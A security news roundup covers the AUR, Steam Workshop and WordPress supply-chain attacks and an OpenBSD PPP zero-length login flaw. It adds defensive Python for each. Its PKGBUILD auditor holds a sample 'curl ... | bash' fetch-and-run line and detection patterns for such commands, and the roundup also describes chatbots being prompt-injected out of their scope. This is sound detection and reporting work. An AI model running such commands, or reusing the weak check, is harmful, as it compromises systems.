Starting on June 11, 2026, the Arch User Repository (AUR) was targeted by malware which rapidly compromised over 1,500 packages. The AUR allows abandoned community packages to be taken over by a new maintainer, which the attackers exploited to claim ownership.
Once the packages were adopted by the malicious maintainers, the next part should sound familiar: The package build scripts, which are executed by the Arch yay and paru package managers, were modified to install malicious NPM packages (atomic-lockfile and js-digest) each containing the now-usual suite of infostealer malware targeting browser credentials and tokens, SSH private keys, package repository tokens, cloud compute, AI tokens, and crypto wallets.
Once installed, the malware uses several tricks to cloak itself: it renames its processes, installs systemd services to restart itself, and uses eBPF filtering in the kernel to hide its sockets and processes further. It specifically targets browsers and Electron-based applications, which are basically a lightweight Chromium browser disguised as an application anyway. Slack, Discord, Signal, and many more use the Electron wrapper.
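Since the compromise rode in on edited build scripts, one defensive check is to diff a PKGBUILD before building it and flag steps that fetch and run code outside pacman's view. This is an added example, not code from the article or the AUR project; the PKGBUILD text, package name and URL are constructed, and the npm package names are the ones the article names.

```python
import re

# Constructed PKGBUILD fragment modelled on the incident described above:
# a build() step that pulls npm packages the software itself never needed.
SUSPECT_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
depends=('glibc')
build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
  npm install -g atomic-lockfile js-digest
  curl -s https://example.invalid/setup.sh | bash
}
"""

CLEAN_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
depends=('glibc')
build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}
"""

# Patterns worth a manual look in a PKGBUILD diff: language package managers
# installing things pacman never sees, and downloads piped straight into a shell.
SUSPICIOUS = [
    ("package-manager install during build", re.compile(r"\b(npm|npx|pip3?|yarn|pnpm)\s+(install|i|add)\b")),
    ("download piped to shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b")),
    ("inline decode-and-run", re.compile(r"base64\s+(-d|--decode)[^\n]*\|\s*(ba|z)?sh\b")),
]

def audit_pkgbuild(text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, reason, line) for each line matching a suspicious pattern."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for reason, pattern in SUSPICIOUS:
            if pattern.search(stripped):
                findings.append((no, reason, stripped))
                break
    return findings

if __name__ == "__main__":
    for no, reason, line in audit_pkgbuild(SUSPECT_PKGBUILD):
        print(f"line {no}: {reason}: {line}")
```

A hit is a prompt to read the diff, not proof of compromise: some Node packages legitimately run npm in build(), which is exactly why the injected lines blended in.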
A preliminary analysis of the malware is available, which breaks down the exact behavior in more detail and lists the known targets of the malware.
Initially believed to be “only” a few hundred packages, the compromised list eventually grew to over 1,500, and additional packages may still be discovered. On June 14, Phoronix reported that a second wave of compromised packages has been found in the AUR repositories, including NeoVim plugins and multiple browsers. The second set of infected packages was compromised in a similar fashion, but with more heavily obfuscated scripts.
Steam Wallpaper Malware
Kaspersky Labs finds that Steam users have been targeted by malware uploaded via a popular animated wallpaper application, “Wallpaper Engine”.
While Valve normally does an admirable job filtering the Steam store, it looks like an exploit has slipped through in “Wallpaper Engine”. Animated wallpapers can be videos, web pages, or full executables themselves. Obviously, being able to run any program masquerading as wallpaper directly is an excellent vector to install malware, so of course this is what happened.
Using the integrated Steam Workshop, which allows users to share game mods and other game content directly, malicious wallpapers install a wide variety of malware including the usual gamut of infostealers, remote access, residential proxy, key logging, and crypto miners. This makes it one of the rare times installing crypto miners almost makes sense, considering most Steam users likely have better than average video cards.
Once a user is infected, the malware also steals the current Steam login credentials, and several instances attempt to then upload additional infected wallpapers to the Steam Workshop under the compromised user’s identity, completing the supply chain circle of life.
WordPress Supply Chain
Sansec discovered a widespread WordPress attack which they estimate impacts 1.2 million sites using the OptinMonster, TrustPulse, and PushEngage plugins. All three plugins come from the same company, Awesome Motive, who also own other popular plugins which Sansec estimates are used in tens of millions of WP sites.
The malware is pushed directly from the Awesome Motive CDN (content delivery network) in the plugin JavaScript, and waits for an administrator to log in. Using the administrator credentials, it then creates a hidden administrator account and ships the credentials to a remote server, giving the attackers full admin access to the WordPress site. The malware attempts to evade detection by detecting headless browsers or browsers with zero-sized windows, and hides itself from the plugin list, user list, updates list, and recent activity lists.
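Because the malware hides its account by filtering what wp-admin displays, the check a site owner actually wants is a query against the database itself. This is an added example, not code from the article or Sansec; the user rows, e-mail addresses and the known-admin set are constructed, and the two WordPress tables are modelled in sqlite so the snippet runs offline.

```python
import sqlite3

# Constructed wp_users / wp_usermeta rows modelled on the attack described above:
# a legitimate admin, an editor, and an attacker-created admin that the
# compromised plugin filters out of the wp-admin user list.
CONSTRUCTED_ROWS = {
    "wp_users": [
        (1, "siteowner", "owner@example.invalid", "2024-03-01 09:00:00"),
        (2, "editor_jane", "jane@example.invalid", "2024-05-12 14:30:00"),
        (3, "wpservice_sup", "sup@mail.invalid", "2026-06-12 03:17:44"),
    ],
    "wp_usermeta": [
        (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ],
}

# Administrators the site owner actually created (assumption: kept out of band,
# e.g. in the site's runbook, so the comparison does not depend on WordPress).
KNOWN_ADMINS = {"siteowner"}

# The plugin hides its account by filtering WordPress's PHP user query, so the
# authoritative list is whatever the database itself returns. On a real site
# run this against MySQL (table prefix and meta_key follow $table_prefix).
ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u
JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%"administrator"%'
ORDER BY u.ID
"""

def build_db(rows=CONSTRUCTED_ROWS) -> sqlite3.Connection:
    """In-memory stand-in carrying only the columns the query needs."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_email TEXT, user_registered TEXT)")
    db.execute("CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT)")
    db.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?)", rows["wp_users"])
    db.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)", rows["wp_usermeta"])
    return db

def list_admins(db: sqlite3.Connection) -> list[tuple]:
    """Every administrator account as the database sees it, hidden or not."""
    return db.execute(ADMIN_QUERY).fetchall()

def unexpected_admins(db: sqlite3.Connection, known=KNOWN_ADMINS) -> list[str]:
    """Admin logins present in the database but absent from the known set."""
    return [row[1] for row in list_admins(db) if row[1] not in known]
```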
Awesome Motive reports that they, in turn, were exploited by a vulnerability in the WordPress UpdraftPlus plugin which was then used to steal the CDN authentication and upload the compromised plugins.
This shouldn’t be confused with April 2026’s widespread WP attack of course, where an attacker purchased the Essential Plugins bundle from the original developers and converted all 30 plugins to Trojan versions immediately, with the first commit being a backdoor mechanism injected into the plugin. The attacker then waited eight months before triggering the backdoor payloads and began exploiting hundreds of thousands of sites.
Purchasing popular plugins has been a security problem for many years already; the browser plugin ecosystem has fallen victim many times to plugins being purchased by bad actors and replaced with malware via normal update mechanisms. The trick has expanded to phone and desktop applications, PyPI and NPM modules, and feels in many ways similar to the attack against the Arch AUR repository, converting trusted plugins and applications into malware vectors.
Unless marketplaces and package repositories mandate that authors provide notification of an ownership change, and automatically revoke updates until users manually confirm them, purchasing a popular tool to infect it will certainly remain a successful tactic. Unfortunately, even with those safeguards, it’s likely to continue, too.
Nor should these compromised plugins be confused with the ShapedPlugin compromise impacting an additional 400,000 WordPress sites, which appears to originate from a compromise of the developing company’s build and distribution process, resulting in a compromised plugin again being served directly from the official sites.
Prompt Injection as Coding Assistant
The Chipotlai-max project twists prompt injection into free coding advice. In March of 2026, Chipotle introduced a new AI chatbot service for customers who are, for some reason, interested in having a conversation with an LLM about burritos, using the Amelia LLM framework. Customers soon discovered the AI could easily be convinced to discuss more than Mexican-ish food, however, with access to the complete LLM framework including coding assistance.
This fork of the OpenCode tool plugs directly into the Chipotle API for all your taco salad coding needs. A joyfully meme-filled reminder that all that lies between a chatbot and everything the model has access to is some careful convincing.
OpenBSD PPP Vulnerable for 27 Years
The OpenBSD project has (rightly) built a long-standing reputation as being a very security-oriented BSD, making almost any security flaw noteworthy. Argus Systems highlights a 27-year-old flaw in the OpenBSD PPP. Yes, the dial-up IP protocol implementation present since 1999. (In other terrible news, 1999 was 27 years ago.)
The bug is only present when OpenBSD is the authentication service for a PPP login, but allows a PPP login with no credentials. As is the case with many protocol handling bugs, the OpenBSD code makes the mistake of trusting the lengths provided by the remote device during the login; if a login request specifies an account and password length of 0, the login is successful.
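To make the length-trusting failure mode concrete, here is an added illustration (not the article’s or OpenBSD’s code) that assumes PAP framing per RFC 1334 and a constructed secrets table: a parser that bounds-checks every peer-supplied length, a weak comparison that accepts zero-length credentials, and the hardened check beside it.

```python
import hmac
import struct

# PAP Authenticate-Request layout (RFC 1334): Code=1, Identifier, Length
# (whole packet, big-endian), Peer-ID-Length, Peer-ID, Passwd-Length, Password.
PAP_AUTH_REQUEST = 1
SECRETS = {b"alice": b"s3cret"}  # constructed demo table; a real peer consults pap-secrets or RADIUS

class BadPacket(ValueError):
    """A peer-supplied length disagrees with the bytes actually received."""

def build_auth_request(ident: int, peer_id: bytes, passwd: bytes) -> bytes:
    body = bytes([len(peer_id)]) + peer_id + bytes([len(passwd)]) + passwd
    return struct.pack("!BBH", PAP_AUTH_REQUEST, ident, 4 + len(body)) + body

def parse_auth_request(pkt: bytes) -> tuple[bytes, bytes]:
    """Check each peer-supplied length against the packet before using it."""
    if len(pkt) < 6:
        raise BadPacket("short header")
    code, _ident, length = struct.unpack("!BBH", pkt[:4])
    if code != PAP_AUTH_REQUEST or length != len(pkt):
        raise BadPacket("code or length field disagrees with packet")
    id_len = pkt[4]
    if 5 + id_len + 1 > length:          # peer-id plus the password-length byte must fit
        raise BadPacket("peer-id length exceeds packet")
    peer_id = pkt[5:5 + id_len]
    pw_len = pkt[5 + id_len]
    if 6 + id_len + pw_len != length:
        raise BadPacket("password length disagrees with packet")
    return peer_id, pkt[6 + id_len:6 + id_len + pw_len]

def authenticate_weak(pkt: bytes) -> bool:
    """Illustration of the failure mode described above (not OpenBSD's code):
    comparing only as many bytes as the peer claims to have sent means a
    zero-length account and password match trivially."""
    peer_id, passwd = parse_auth_request(pkt)
    secret = SECRETS.get(peer_id, b"")
    return secret[:len(passwd)] == passwd

def authenticate(pkt: bytes) -> bool:
    """Hardened check: malformed packets and empty credentials are rejected and
    the whole stored secret is compared in constant time."""
    try:
        peer_id, passwd = parse_auth_request(pkt)
    except BadPacket:
        return False
    if not peer_id or not passwd or peer_id not in SECRETS:
        return False
    return hmac.compare_digest(SECRETS[peer_id], passwd)
```

The weak variant also accepts any correct prefix of the password, which shows why the fix is to compare against the stored secret’s full length rather than the peer’s claimed one.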
The chances of this being relevant today are slim, though the code is also used in the more modern PPP over Ethernet (PPPoE) protocol found on some DSL connections.
Anthropic Mythos Inaccessible
In a monumental “why are you hitting yourself” moment that made national news, after hyping the claims of the incredible auto-hacking abilities of the Mythos model, Anthropic has been ordered by the US government to restrict access to it because of national security concerns. In what will likely be framed as “an abundance of caution”, Anthropic has removed public access entirely.
The root cause appears to be — and let us all act surprised, here — essentially prompt injection, combined of course with politics. It appears that Amazon engineers were able to convince the model to disclose “cyberattack information”, which reads like a glamorous way to say “it discussed security”. If Anthropic hadn’t been bombarding the news cycle with how dangerous Mythos was, it’s likely this would not have made national news, as most publicly available LLM models can be coaxed to assist with security research and exploit development.
It is currently unclear when the Mythos and Fable LLM models will be publicly available again, what attempts at guardrails will be required before that can happen, and if limited access will continue for partnered companies to continue the much-hyped vulnerability finding process which has made the news cycles for the past weeks.

Regarding the PPP vulnerability, I once went for a summer job at BT labs in Ipswich. Not really a formal interview, just asking questions as we looked around the place – one of those was about the current BT ADSL authentication (this being IIRC 2002 so earlyish in BT’s ADSL rollout). I had a think, and couldn’t fathom why there would be authentication for ADSL as your line is tagged with the phone number, and you can’t have multiple ISPs with ADSL (based on the not so straightforward process of switching ADSL ISP) so what role does authentication play? To stop somebody tapping your phoneline and ‘stealing’ your internets?
As it turned out, the ‘authentication’ is to route you to your ISP so potentially you could have multiple ISPs on the same line, which in some niche cases could be useful. I never found out if one could use credentials for another ISP on your line (which I heavily suspect wouldn’t work). As ADSL then used PPPoA it may not have been susceptible, but if it was then what would have happened had one provided zero length credentials to BT’s RADIUS servers :)
approx 20 years ago I successfully “ran” two parallel PPPoE connections over one ADSL line (through a single ADSL modem) – just added a switch between modem and existing router to attach a second router.
Primary connection was to our normal ISP and the second one was 750h of free AOL :D – just for funsies.
And I think there was a time where it was common for gaming consoles (XBOX 1-2, PS2 ?) to offer the option to establish a PPPoE connection over their ethernet port (to get a public IP I think – bypassing the existing router).
At least some router OS had an option to enable or disable PPPoE pass-through.